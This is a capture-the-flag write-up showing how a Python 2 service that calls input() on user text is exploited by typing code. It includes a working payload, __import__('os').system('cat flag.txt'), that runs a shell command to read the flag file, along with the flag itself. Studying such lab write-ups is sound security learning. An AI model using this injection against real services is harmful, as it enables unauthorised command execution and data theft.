Tags: python2
Rating:
After connecting to the server, it seems it's a python2 shell interpreter. Try to give an input `Maurus` we got this error.
```
2.7.18 (default, Apr 20 2020, 20:30:41)
[GCC 9.3.0]
Do you sound like an alien?
>>>
Maurus
Traceback (most recent call last):
File "input_as_a_service.py", line 16, in <module>
main()
File "input_as_a_service.py", line 12, in main
text = input(' ')
File "<string>", line 1, in <module>
NameError: name 'Maurus' is not defined
```
It seems the program tries to recognize the variable `Maurus` but it didn't. This is a well known issue with `input` function in python2.x
> The vulnerability in input() method lies in the fact that the variable accessing
> the value of input can be accessed by anyone just by using the name of variable or method
In other words, our input will be treated as python code and will be executed.
Our goal is to retrieve the flag. But where it is ? Maybe in the same diretory as the running program. A way to do it is using [Python One-Liner](https://wiki.python.org/moin/Powerful%20Python%20One-Liners)
My payload was
`__import__('os').system('cat flag.txt')`
and **BOOM !**
```
2.7.18 (default, Apr 20 2020, 20:30:41)
[GCC 9.3.0]
Do you sound like an alien?
>>>
__import__('os').system('cat flag.txt')
CHTB{4li3n5_us3_pyth0n2.X?!}
0
```
```
> Flag: CHTB{4li3n5_us3_pyth0n2.X?!}
```